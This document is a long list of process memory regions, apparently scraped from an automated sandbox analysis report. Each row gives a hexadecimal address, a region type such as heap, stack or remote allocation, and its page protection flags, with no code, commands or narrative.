271C208F000
|
heap
|
page read and write
|
||
|
1A98C762000
|
trusted library allocation
|
page read and write
|
||
|
7F7C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
271C1EDD000
|
heap
|
page read and write
|
||
|
59B403E000
|
stack
|
page read and write
|
||
|
271C2170000
|
heap
|
page read and write
|
||
|
1A98CBD1000
|
trusted library allocation
|
page read and write
|
||
|
A30000
|
heap
|
page read and write
|
||
|
271C1EDC000
|
heap
|
page read and write
|
||
|
4620000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
776B000
|
stack
|
page read and write
|
||
|
4C7000
|
unkown
|
page readonly
|
||
|
3354000
|
heap
|
page read and write
|
||
|
84B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B99D000
|
trusted library allocation
|
page execute and read and write
|
||
|
B90000
|
unkown
|
page readonly
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A98000
|
stack
|
page read and write
|
||
|
7690000
|
trusted library allocation
|
page read and write
|
||
|
4680000
|
trusted library allocation
|
page read and write
|
||
|
2DA4000
|
heap
|
page read and write
|
||
|
1A98CBE3000
|
trusted library allocation
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
6310000
|
remote allocation
|
page execute and read and write
|
||
|
1A98A865000
|
heap
|
page read and write
|
||
|
74B0000
|
trusted library allocation
|
page read and write
|
||
|
271C1FE4000
|
heap
|
page read and write
|
||
|
271C00D5000
|
heap
|
page read and write
|
||
|
271C1F06000
|
heap
|
page read and write
|
||
|
271C2120000
|
heap
|
page read and write
|
||
|
1A99C48C000
|
trusted library allocation
|
page read and write
|
||
|
2560000
|
heap
|
page read and write
|
||
|
271C00ED000
|
heap
|
page read and write
|
||
|
271C20A6000
|
heap
|
page read and write
|
||
|
2D90000
|
heap
|
page read and write
|
||
|
E41000
|
heap
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
3158000
|
heap
|
page read and write
|
||
|
271C2093000
|
heap
|
page read and write
|
||
|
233E000
|
stack
|
page read and write
|
||
|
271C219B000
|
heap
|
page read and write
|
||
|
3163000
|
heap
|
page read and write
|
||
|
271C20C2000
|
heap
|
page read and write
|
||
|
23AF3000
|
heap
|
page read and write
|
||
|
5910000
|
remote allocation
|
page execute and read and write
|
||
|
6E40000
|
direct allocation
|
page read and write
|
||
|
271C1F6E000
|
heap
|
page read and write
|
||
|
2580000
|
heap
|
page read and write
|
||
|
271C1F16000
|
heap
|
page read and write
|
||
|
758E000
|
stack
|
page read and write
|
||
|
3174000
|
heap
|
page read and write
|
||
|
271C2034000
|
heap
|
page read and write
|
||
|
5C0000
|
unkown
|
page readonly
|
||
|
1A99C18F000
|
trusted library allocation
|
page read and write
|
||
|
271C212D000
|
heap
|
page read and write
|
||
|
271C207E000
|
heap
|
page read and write
|
||
|
1A98E364000
|
trusted library allocation
|
page read and write
|
||
|
1161000
|
system
|
page execute and read and write
|
||
|
1A98A7F0000
|
trusted library allocation
|
page read and write
|
||
|
271C1F4E000
|
heap
|
page read and write
|
||
|
271C1FED000
|
heap
|
page read and write
|
||
|
D9E000
|
stack
|
page read and write
|
||
|
AE0000
|
unkown
|
page readonly
|
||
|
2564000
|
heap
|
page read and write
|
||
|
6EAE000
|
stack
|
page read and write
|
||
|
DD000
|
stack
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page execute and read and write
|
||
|
2379F000
|
stack
|
page read and write
|
||
|
85DB000
|
stack
|
page read and write
|
||
|
271C1F6E000
|
heap
|
page read and write
|
||
|
271C2093000
|
heap
|
page read and write
|
||
|
271C20E5000
|
heap
|
page read and write
|
||
|
271C1EEB000
|
heap
|
page read and write
|
||
|
E3D000
|
heap
|
page read and write
|
||
|
271C2402000
|
heap
|
page read and write
|
||
|
8226000
|
heap
|
page read and write
|
||
|
BB0000
|
heap
|
page read and write
|
||
|
7F00000
|
direct allocation
|
page read and write
|
||
|
3251000
|
heap
|
page read and write
|
||
|
1A98A830000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B993000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
6E00000
|
direct allocation
|
page read and write
|
||
|
271C1EE3000
|
heap
|
page read and write
|
||
|
1A98C050000
|
trusted library allocation
|
page read and write
|
||
|
6EEA000
|
stack
|
page read and write
|
||
|
2C7D000
|
stack
|
page read and write
|
||
|
2358E000
|
stack
|
page read and write
|
||
|
A30000
|
heap
|
page read and write
|
||
|
4DB4000
|
trusted library allocation
|
page read and write
|
||
|
4160000
|
unkown
|
page execute and read and write
|
||
|
E33000
|
heap
|
page read and write
|
||
|
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
|
F30000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
271C005D000
|
heap
|
page read and write
|
||
|
74D0000
|
trusted library allocation
|
page read and write
|
||
|
271C2061000
|
heap
|
page read and write
|
||
|
1A98CC20000
|
trusted library allocation
|
page read and write
|
||
|
271C00C7000
|
heap
|
page read and write
|
||
|
271C235C000
|
heap
|
page read and write
|
||
|
EFE000
|
stack
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
4BCD000
|
unkown
|
page execute and read and write
|
||
|
271C20D1000
|
heap
|
page read and write
|
||
|
4BE000
|
unkown
|
page readonly
|
||
|
271C0020000
|
heap
|
page read and write
|
||
|
271C2061000
|
heap
|
page read and write
|
||
|
271C2061000
|
heap
|
page read and write
|
||
|
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
|
271C231B000
|
heap
|
page read and write
|
||
|
271C1EE3000
|
heap
|
page read and write
|
||
|
271C1F26000
|
heap
|
page read and write
|
||
|
1A98A875000
|
heap
|
page read and write
|
||
|
81F0000
|
heap
|
page read and write
|
||
|
271C219B000
|
heap
|
page read and write
|
||
|
B98000
|
heap
|
page read and write
|
||
|
271C1B80000
|
heap
|
page read and write
|
||
|
2C39000
|
heap
|
page read and write
|
||
|
271C2045000
|
heap
|
page read and write
|
||
|
3174000
|
heap
|
page read and write
|
||
|
4A48000
|
heap
|
page read and write
|
||
|
31D0000
|
heap
|
page read and write
|
||
|
3165000
|
heap
|
page read and write
|
||
|
271C1EE8000
|
heap
|
page read and write
|
||
|
5E0000
|
unkown
|
page readonly
|
||
|
7FFD9B994000
|
trusted library allocation
|
page read and write
|
||
|
271C20A2000
|
heap
|
page read and write
|
||
|
6C5F000
|
stack
|
page read and write
|
||
|
271C00DC000
|
heap
|
page read and write
|
||
|
725F000
|
stack
|
page read and write
|
||
|
271C005F000
|
heap
|
page read and write
|
||
|
D5405FF000
|
stack
|
page read and write
|
||
|
3010000
|
remote allocation
|
page execute and read and write
|
||
|
C30000
|
heap
|
page read and write
|
||
|
DC8000
|
heap
|
page read and write
|
||
|
4798000
|
heap
|
page read and write
|
||
|
EFC000
|
stack
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
4B0000
|
unkown
|
page readonly
|
||
|
57A1000
|
trusted library allocation
|
page read and write
|
||
|
271C215D000
|
heap
|
page read and write
|
||
|
271C20ED000
|
heap
|
page read and write
|
||
|
271C00DC000
|
heap
|
page read and write
|
||
|
3251000
|
heap
|
page read and write
|
||
|
1A98A645000
|
heap
|
page read and write
|
||
|
7660000
|
trusted library allocation
|
page read and write
|
||
|
271C20B0000
|
heap
|
page read and write
|
||
|
271C213D000
|
heap
|
page read and write
|
||
|
271C2165000
|
heap
|
page read and write
|
||
|
1A98A810000
|
trusted library allocation
|
page read and write
|
||
|
4B1000
|
unkown
|
page execute read
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
6DF0000
|
direct allocation
|
page read and write
|
||
|
316E000
|
heap
|
page read and write
|
||
|
22EE000
|
unkown
|
page read and write
|
||
|
E34000
|
heap
|
page read and write
|
||
|
271C1F1B000
|
heap
|
page read and write
|
||
|
1A98DDAB000
|
trusted library allocation
|
page read and write
|
||
|
283491D5000
|
heap
|
page read and write
|
||
|
2D5F000
|
stack
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
271C205D000
|
heap
|
page read and write
|
||
|
271C205D000
|
heap
|
page read and write
|
||
|
4F42000
|
unclassified section
|
page read and write
|
||
|
A20000
|
unkown
|
page read and write
|
||
|
7ED0000
|
direct allocation
|
page read and write
|
||
|
271C207E000
|
heap
|
page read and write
|
||
|
6C1E000
|
stack
|
page read and write
|
||
|
271C205D000
|
heap
|
page read and write
|
||
|
271C2570000
|
heap
|
page read and write
|
||
|
271C2273000
|
heap
|
page read and write
|
||
|
41CD000
|
unkown
|
page execute and read and write
|
||
|
4630000
|
trusted library allocation
|
page read and write
|
||
|
271C1F6E000
|
heap
|
page read and write
|
||
|
271C20D1000
|
heap
|
page read and write
|
||
|
4C5000
|
unkown
|
page read and write
|
||
|
7517000
|
trusted library allocation
|
page read and write
|
||
|
2BF0000
|
unkown
|
page readonly
|
||
|
271C1ED0000
|
heap
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
||
|
32CE000
|
unkown
|
page read and write
|
||
|
271C2083000
|
heap
|
page read and write
|
||
|
2342E000
|
stack
|
page read and write
|
||
|
3250000
|
heap
|
page read and write
|
||
|
271C2093000
|
heap
|
page read and write
|
||
|
271C211D000
|
heap
|
page read and write
|
||
|
271C20B4000
|
heap
|
page read and write
|
||
|
59B3B7D000
|
stack
|
page read and write
|
||
|
271C1F43000
|
heap
|
page read and write
|
||
|
2A20000
|
unkown
|
page read and write
|
||
|
1A9A4770000
|
heap
|
page read and write
|
||
|
2EEF000
|
stack
|
page read and write
|
||
|
7EB0000
|
direct allocation
|
page read and write
|
||
|
BE1000
|
unkown
|
page readonly
|
||
|
4D1D000
|
direct allocation
|
page execute and read and write
|
||
|
865C000
|
stack
|
page read and write
|
||
|
271C2387000
|
heap
|
page read and write
|
||
|
271C2155000
|
heap
|
page read and write
|
||
|
73D6000
|
heap
|
page read and write
|
||
|
271C23B3000
|
heap
|
page read and write
|
||
|
4B71000
|
heap
|
page read and write
|
||
|
4790000
|
heap
|
page read and write
|
||
|
271C2045000
|
heap
|
page read and write
|
||
|
333C000
|
heap
|
page read and write
|
||
|
1A98A6DF000
|
heap
|
page read and write
|
||
|
271C0029000
|
heap
|
page read and write
|
||
|
46CE000
|
stack
|
page read and write
|
||
|
271C219B000
|
heap
|
page read and write
|
||
|
271C005D000
|
heap
|
page read and write
|
||
|
826B000
|
heap
|
page read and write
|
||
|
893DAFF000
|
unkown
|
page read and write
|
||
|
271C1F1B000
|
heap
|
page read and write
|
||
|
271C23B3000
|
heap
|
page read and write
|
||
|
94C000
|
stack
|
page read and write
|
||
|
2D1E000
|
stack
|
page read and write
|
||
|
1A98A860000
|
heap
|
page read and write
|
||
|
5931000
|
trusted library allocation
|
page read and write
|
||
|
1A98A850000
|
heap
|
page execute and read and write
|
||
|
BC0000
|
heap
|
page read and write
|
||
|
B90000
|
unkown
|
page readonly
|
||
|
9E67000
|
trusted library allocation
|
page read and write
|
||
|
23C9E000
|
direct allocation
|
page execute and read and write
|
||
|
271C1EF3000
|
heap
|
page read and write
|
||
|
2371C000
|
stack
|
page read and write
|
||
|
271C1F3E000
|
heap
|
page read and write
|
||
|
271C20D5000
|
heap
|
page read and write
|
||
|
1A98CBF2000
|
trusted library allocation
|
page read and write
|
||
|
1A98E1AC000
|
trusted library allocation
|
page read and write
|
||
|
1A9A4730000
|
heap
|
page execute and read and write
|
||
|
B70000
|
heap
|
page read and write
|
||
|
22A0000
|
heap
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
1A98C181000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCF0000
|
trusted library allocation
|
page read and write
|
||
|
271C2300000
|
heap
|
page read and write
|
||
|
271C2061000
|
heap
|
page read and write
|
||
|
7FFD9BB41000
|
trusted library allocation
|
page read and write
|
||
|
271C03E5000
|
heap
|
page read and write
|
||
|
6D10000
|
remote allocation
|
page execute and read and write
|
||
|
4662000
|
trusted library allocation
|
page read and write
|
||
|
9A0000
|
unkown
|
page readonly
|
||
|
271C2140000
|
heap
|
page read and write
|
||
|
271C2093000
|
heap
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
271C00C7000
|
heap
|
page read and write
|
||
|
271C208F000
|
heap
|
page read and write
|
||
|
8670000
|
trusted library allocation
|
page read and write
|
||
|
2520000
|
unkown
|
page read and write
|
||
|
231EE000
|
stack
|
page read and write
|
||
|
7F20000
|
direct allocation
|
page read and write
|
||
|
4728000
|
trusted library allocation
|
page read and write
|
||
|
D53FEFE000
|
stack
|
page read and write
|
||
|
271C208F000
|
heap
|
page read and write
|
||
|
271C2118000
|
heap
|
page read and write
|
||
|
7490000
|
trusted library allocation
|
page read and write
|
||
|
59B3BFE000
|
stack
|
page read and write
|
||
|
271C1FE4000
|
heap
|
page read and write
|
||
|
352F000
|
unkown
|
page read and write
|
||
|
271C219B000
|
heap
|
page read and write
|
||
|
1A9A468E000
|
heap
|
page read and write
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
DA0000
|
heap
|
page read and write
|
||
|
893DBFF000
|
stack
|
page read and write
|
||
|
E80000
|
trusted library allocation
|
page read and write
|
||
|
D5406FB000
|
stack
|
page read and write
|
||
|
1A99C181000
|
trusted library allocation
|
page read and write
|
||
|
271C0049000
|
heap
|
page read and write
|
||
|
DF4000
|
heap
|
page read and write
|
||
|
AD0000
|
unkown
|
page readonly
|
||
|
B4A000
|
stack
|
page read and write
|
||
|
1A98A600000
|
heap
|
page read and write
|
||
|
2D54000
|
heap
|
page read and write
|
||
|
271C2150000
|
heap
|
page read and write
|
||
|
23A82000
|
heap
|
page read and write
|
||
|
A11000
|
unkown
|
page readonly
|
||
|
73AE000
|
heap
|
page read and write
|
||
|
7FFD9B9EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
B60000
|
unkown
|
page readonly
|
||
|
2340000
|
heap
|
page read and write
|
||
|
1A9A46C4000
|
heap
|
page read and write
|
||
|
4B2E000
|
stack
|
page read and write
|
||
|
271C20E5000
|
heap
|
page read and write
|
||
|
6CDE000
|
stack
|
page read and write
|
||
|
1A98C3A7000
|
trusted library allocation
|
page read and write
|
||
|
3251000
|
heap
|
page read and write
|
||
|
7469000
|
heap
|
page read and write
|
||
|
271C2114000
|
heap
|
page read and write
|
||
|
8100000
|
heap
|
page read and write
|
||
|
271C2307000
|
heap
|
page read and write
|
||
|
E56000
|
heap
|
page read and write
|
||
|
271C1F69000
|
heap
|
page read and write
|
||
|
316E000
|
heap
|
page read and write
|
||
|
8750000
|
direct allocation
|
page read and write
|
||
|
1A98A820000
|
heap
|
page readonly
|
||
|
28349140000
|
heap
|
page read and write
|
||
|
8660000
|
trusted library allocation
|
page read and write
|
||
|
6E20000
|
direct allocation
|
page read and write
|
||
|
271C230F000
|
heap
|
page read and write
|
||
|
1A98A870000
|
heap
|
page read and write
|
||
|
271C25E8000
|
heap
|
page read and write
|
||
|
819E000
|
stack
|
page read and write
|
||
|
271C1FD0000
|
heap
|
page read and write
|
||
|
271C20E0000
|
heap
|
page read and write
|
||
|
4FD8000
|
trusted library allocation
|
page read and write
|
||
|
BD0000
|
unkown
|
page read and write
|
||
|
271C1FE0000
|
heap
|
page read and write
|
||
|
1A9A4636000
|
heap
|
page read and write
|
||
|
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
|
271C0050000
|
heap
|
page read and write
|
||
|
271C2110000
|
heap
|
page read and write
|
||
|
2629D000
|
unclassified section
|
page execute and read and write
|
||
|
271C1F6B000
|
heap
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
8130000
|
trusted library allocation
|
page read and write
|
||
|
7710000
|
remote allocation
|
page execute and read and write
|
||
|
271C207D000
|
heap
|
page read and write
|
||
|
271C1F6E000
|
heap
|
page read and write
|
||
|
271C20B0000
|
heap
|
page read and write
|
||
|
271C2115000
|
heap
|
page read and write
|
||
|
271C2061000
|
heap
|
page read and write
|
||
|
271C1F0E000
|
heap
|
page read and write
|
||
|
237A0000
|
heap
|
page read and write
|
||
|
2BCF000
|
unkown
|
page read and write
|
||
|
271C219B000
|
heap
|
page read and write
|
||
|
95C000
|
stack
|
page read and write
|
||
|
1101000
|
unkown
|
page readonly
|
||
|
271C2386000
|
heap
|
page read and write
|
||
|
1A98DAB0000
|
trusted library allocation
|
page read and write
|
||
|
23DCD000
|
direct allocation
|
page execute and read and write
|
||
|
23530000
|
direct allocation
|
page read and write
|
||
|
719E000
|
stack
|
page read and write
|
||
|
7FFD9BD20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
271C205D000
|
heap
|
page read and write
|
||
|
271C2005000
|
heap
|
page read and write
|
||
|
271C20F5000
|
heap
|
page read and write
|
||
|
271C20DD000
|
heap
|
page read and write
|
||
|
2F58000
|
heap
|
page read and write
|
||
|
271C2325000
|
heap
|
page read and write
|
||
|
271C00DC000
|
heap
|
page read and write
|
||
|
271C246A000
|
heap
|
page read and write
|
||
|
7FFD9BA4C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7EE0000
|
direct allocation
|
page read and write
|
||
|
2520000
|
unkown
|
page read and write
|
||
|
271C232F000
|
heap
|
page read and write
|
||
|
BC0000
|
heap
|
page read and write
|
||
|
74BA000
|
trusted library allocation
|
page read and write
|
||
|
1A98CBB7000
|
trusted library allocation
|
page read and write
|
||
|
859C000
|
stack
|
page read and write
|
||
|
8110000
|
trusted library allocation
|
page execute and read and write
|
||
|
4633000
|
trusted library allocation
|
page execute and read and write
|
||
|
271C1F2E000
|
heap
|
page read and write
|
||
|
70DD000
|
stack
|
page read and write
|
||
|
BE1000
|
unkown
|
page readonly
|
||
|
1A98A5A0000
|
heap
|
page read and write
|
||
|
271C207F000
|
heap
|
page read and write
|
||
|
D5400FF000
|
stack
|
page read and write
|
||
|
3251000
|
heap
|
page read and write
|
||
|
1A98A580000
|
heap
|
page read and write
|
||
|
1A9A492B000
|
heap
|
page read and write
|
||
|
2BE4000
|
heap
|
page read and write
|
||
|
1100000
|
unkown
|
page readonly
|
||
|
990000
|
unkown
|
page readonly
|
||
|
1A98CA61000
|
trusted library allocation
|
page read and write
|
||
|
1A98E13E000
|
trusted library allocation
|
page read and write
|
||
|
B9C0000
|
direct allocation
|
page execute and read and write
|
||
|
271C1F33000
|
heap
|
page read and write
|
||
|
DE6000
|
heap
|
page read and write
|
||
|
271C232F000
|
heap
|
page read and write
|
||
|
B9C000
|
heap
|
page read and write
|
||
|
271C1F46000
|
heap
|
page read and write
|
||
|
1A98A665000
|
heap
|
page read and write
|
||
|
7540000
|
heap
|
page execute and read and write
|
||
|
1A98CBC7000
|
trusted library allocation
|
page read and write
|
||
|
271C232F000
|
heap
|
page read and write
|
||
|
271C2317000
|
heap
|
page read and write
|
||
|
C30000
|
direct allocation
|
page read and write
|
||
|
11DD000
|
system
|
page execute and read and write
|
||
|
271C1EFD000
|
heap
|
page read and write
|
||
|
271C2386000
|
heap
|
page read and write
|
||
|
28349150000
|
heap
|
page read and write
|
||
|
271C1EF6000
|
heap
|
page read and write
|
||
|
271C1EFF000
|
heap
|
page read and write
|
||
|
337E000
|
heap
|
page read and write
|
||
|
F10000
|
heap
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
E50000
|
heap
|
page read and write
|
||
|
7EF0000
|
direct allocation
|
page read and write
|
||
|
4660000
|
trusted library allocation
|
page read and write
|
||
|
4B0000
|
unkown
|
page readonly
|
||
|
271C20C4000
|
heap
|
page read and write
|
||
|
271C231D000
|
heap
|
page read and write
|
||
|
7DF4AAC70000
|
trusted library allocation
|
page execute and read and write
|
||
|
313D000
|
stack
|
page read and write
|
||
|
237A9000
|
heap
|
page read and write
|
||
|
1200000
|
unkown
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
271C20F8000
|
heap
|
page read and write
|
||
|
271C2158000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
760E000
|
stack
|
page read and write
|
||
|
2C2E000
|
stack
|
page read and write
|
||
|
293F000
|
unkown
|
page read and write
|
||
|
7FB0000
|
heap
|
page read and write
|
||
|
271C1F05000
|
heap
|
page read and write
|
||
|
316E000
|
heap
|
page read and write
|
||
|
271C208F000
|
heap
|
page read and write
|
||
|
271C1F2D000
|
heap
|
page read and write
|
||
|
271C22FD000
|
heap
|
page read and write
|
||
|
59B4C8B000
|
stack
|
page read and write
|
||
|
271BFF90000
|
heap
|
page read and write
|
||
|
271C2034000
|
heap
|
page read and write
|
||
|
D90000
|
heap
|
page read and write
|
||
|
2690000
|
unkown
|
page readonly
|
||
|
48F8000
|
trusted library allocation
|
page read and write
|
||
|
4BE000
|
unkown
|
page readonly
|
||
|
271C23D7000
|
heap
|
page read and write
|
||
|
E52000
|
heap
|
page read and write
|
||
|
271C219B000
|
heap
|
page read and write
|
||
|
2BE4000
|
heap
|
page read and write
|
||
|
8740000
|
direct allocation
|
page read and write
|
||
|
271C25E8000
|
heap
|
page read and write
|
||
|
271C2189000
|
heap
|
page read and write
|
||
|
271C03C0000
|
remote allocation
|
page read and write
|
||
|
90C0000
|
direct allocation
|
page execute and read and write
|
||
|
23540000
|
direct allocation
|
page read and write
|
||
|
A00000
|
unkown
|
page read and write
|
||
|
95C000
|
stack
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
271C1EE6000
|
heap
|
page read and write
|
||
|
D5401FE000
|
stack
|
page read and write
|
||
|
F18000
|
heap
|
page read and write
|
||
|
271C22F5000
|
heap
|
page read and write
|
||
|
271C00D9000
|
heap
|
page read and write
|
||
|
271C2273000
|
heap
|
page read and write
|
||
|
1A9A45F4000
|
heap
|
page read and write
|
||
|
271C1F13000
|
heap
|
page read and write
|
||
|
84A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
D53FDFE000
|
stack
|
page read and write
|
||
|
DF4000
|
heap
|
page read and write
|
||
|
2A00000
|
unkown
|
page readonly
|
||
|
990000
|
unkown
|
page readonly
|
||
|
271C2168000
|
heap
|
page read and write
|
||
|
59B3AFF000
|
stack
|
page read and write
|
||
|
271C230A000
|
heap
|
page read and write
|
||
|
DB5000
|
heap
|
page read and write
|
||
|
4C5000
|
unkown
|
page read and write
|
||
|
1A99C47C000
|
trusted library allocation
|
page read and write
|
||
|
1A98A60D000
|
heap
|
page read and write
|
||
|
2DB9000
|
heap
|
page read and write
|
||
|
8241000
|
heap
|
page read and write
|
||
|
271C1F06000
|
heap
|
page read and write
|
||
|
271C1FE4000
|
heap
|
page read and write
|
||
|
271C205D000
|
heap
|
page read and write
|
||
|
F60000
|
direct allocation
|
page read and write
|
||
|
2C3D000
|
stack
|
page read and write
|
||
|
2CE2000
|
unkown
|
page read and write
|
||
|
271C202C000
|
heap
|
page read and write
|
||
|
271C1EFA000
|
heap
|
page read and write
|
||
|
271C2138000
|
heap
|
page read and write
|
||
|
F10000
|
heap
|
page read and write
|
||
|
271C1F6E000
|
heap
|
page read and write
|
||
|
271C2170000
|
heap
|
page read and write
|
||
|
4650000
|
trusted library allocation
|
page read and write
|
||
|
271C22FD000
|
heap
|
page read and write
|
||
|
271C20D8000
|
heap
|
page read and write
|
||
|
D5E000
|
stack
|
page read and write
|
||
|
29FE000
|
unkown
|
page read and write
|
||
|
1A9A4B90000
|
heap
|
page read and write
|
||
|
75CF000
|
stack
|
page read and write
|
||
|
B78000
|
heap
|
page read and write
|
||
|
271C209F000
|
heap
|
page read and write
|
||
|
2D61000
|
heap
|
page read and write
|
||
|
271C004F000
|
heap
|
page read and write
|
||
|
2DD3000
|
heap
|
page read and write
|
||
|
D7C0000
|
direct allocation
|
page execute and read and write
|
||
|
2322E000
|
stack
|
page read and write
|
||
|
271C1ED7000
|
heap
|
page read and write
|
||
|
4B75000
|
heap
|
page read and write
|
||
|
6BDE000
|
stack
|
page read and write
|
||
|
271C22D1000
|
heap
|
page read and write
|
||
|
E3D000
|
heap
|
page read and write
|
||
|
271C1F06000
|
heap
|
page read and write
|
||
|
271C1F6E000
|
heap
|
page read and write
|
||
|
271C1F4B000
|
heap
|
page read and write
|
||
|
71DE000
|
stack
|
page read and write
|
||
|
7FFD9B992000
|
trusted library allocation
|
page read and write
|
||
|
271C2034000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
271C2476000
|
heap
|
page read and write
|
||
|
271C03E0000
|
heap
|
page read and write
|
||
|
271C2273000
|
heap
|
page read and write
|
||
|
23300000
|
heap
|
page read and write
|
||
|
235CF000
|
stack
|
page read and write
|
||
|
681E000
|
stack
|
page read and write
|
||
|
271C00E3000
|
heap
|
page read and write
|
||
|
271C1F6E000
|
heap
|
page read and write
|
||
|
D10000
|
heap
|
page read and write
|
||
|
980000
|
unkown
|
page readonly
|
||
|
715B000
|
stack
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
DB0000
|
heap
|
page read and write
|
||
|
271C208F000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4665000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A98DDBE000
|
trusted library allocation
|
page read and write
|
||
|
709D000
|
stack
|
page read and write
|
||
|
7EA0000
|
direct allocation
|
page read and write
|
||
|
314E000
|
stack
|
page read and write
|
||
|
8770000
|
direct allocation
|
page read and write
|
||
|
362F000
|
stack
|
page read and write
|
||
|
271C219B000
|
heap
|
page read and write
|
||
|
5D0000
|
unkown
|
page readonly
|
||
|
271C217B000
|
heap
|
page read and write
|
||
|
4600000
|
trusted library section
|
page read and write
|
||
|
6D1E000
|
stack
|
page read and write
|
||
|
4BF0000
|
direct allocation
|
page execute and read and write
|
||
|
271C20B1000
|
heap
|
page read and write
|
||
|
271C20D0000
|
heap
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
23C2D000
|
direct allocation
|
page execute and read and write
|
||
|
4BE6000
|
heap
|
page read and write
|
||
|
B4A000
|
stack
|
page read and write
|
||
|
D5402FB000
|
stack
|
page read and write
|
||
|
7291000
|
heap
|
page read and write
|
||
|
3630000
|
heap
|
page read and write
|
||
|
271C20E4000
|
heap
|
page read and write
|
||
|
4DCC000
|
trusted library allocation
|
page read and write
|
||
|
3150000
|
heap
|
page read and write
|
||
|
1A98A654000
|
heap
|
page read and write
|
||
|
271C214D000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
8730000
|
direct allocation
|
page read and write
|
||
|
22F0000
|
heap
|
page read and write
|
||
|
D70000
|
unkown
|
page readonly
|
||
|
271C1F69000
|
heap
|
page read and write
|
||
|
7E60000
|
direct allocation
|
page read and write
|
||
|
271C2045000
|
heap
|
page read and write
|
||
|
B78000
|
heap
|
page read and write
|
||
|
271C28D0000
|
heap
|
page read and write
|
||
|
2DB7000
|
heap
|
page read and write
|
||
|
465A000
|
trusted library allocation
|
page execute and read and write
|
||
|
AC0000
|
unkown
|
page readonly
|
||
|
271C1F63000
|
heap
|
page read and write
|
||
|
271C00E3000
|
heap
|
page read and write
|
||
|
271C1F58000
|
heap
|
page read and write
|
||
|
7FFD9BB4A000
|
trusted library allocation
|
page read and write
|
||
|
2C7D000
|
stack
|
page read and write
|
||
|
271C1F24000
|
heap
|
page read and write
|
||
|
76E0000
|
trusted library allocation
|
page read and write
|
||
|
1A99C46D000
|
trusted library allocation
|
page read and write
|
||
|
23A7E000
|
heap
|
page read and write
|
||
|
1A98A68F000
|
heap
|
page read and write
|
||
|
3163000
|
heap
|
page read and write
|
||
|
1A98A68D000
|
heap
|
page read and write
|
||
|
82A5000
|
heap
|
page read and write
|
||
|
271C1EEE000
|
heap
|
page read and write
|
||
|
271C004A000
|
heap
|
page read and write
|
||
|
67DC000
|
stack
|
page read and write
|
||
|
1220000
|
unkown
|
page readonly
|
||
|
271C00E3000
|
heap
|
page read and write
|
||
|
271C2061000
|
heap
|
page read and write
|
||
|
271C207D000
|
heap
|
page read and write
|
||
|
271C1EFB000
|
heap
|
page read and write
|
||
|
1A9A4774000
|
heap
|
page read and write
|
||
|
7EC0000
|
direct allocation
|
page read and write
|
||
|
2564000
|
heap
|
page read and write
|
||
|
AC0000
|
unkown
|
page readonly
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
271C2093000
|
heap
|
page read and write
|
||
|
8680000
|
trusted library allocation
|
page read and write
|
||
|
2AC0000
|
heap
|
page read and write
|
||
|
7E90000
|
direct allocation
|
page read and write
|
||
|
7F10000
|
direct allocation
|
page read and write
|
||
|
271C2093000
|
heap
|
page read and write
|
||
|
271C2045000
|
heap
|
page read and write
|
||
|
271C1F1E000
|
heap
|
page read and write
|
||
|
59B40BE000
|
stack
|
page read and write
|
||
|
271C2179000
|
heap
|
page read and write
|
||
|
283493C0000
|
heap
|
page read and write
|
||
|
EFC000
|
stack
|
page read and write
|
||
|
2DB4000
|
heap
|
page read and write
|
||
|
271C2193000
|
heap
|
page read and write
|
||
|
271C24D1000
|
heap
|
page read and write
|
||
|
E1E000
|
heap
|
page read and write
|
||
|
271C1EFD000
|
heap
|
page read and write
|
||
|
2A20000
|
unkown
|
page read and write
|
||
|
3180000
|
unkown
|
page execute and read and write
|
||
|
271C00EA000
|
heap
|
page read and write
|
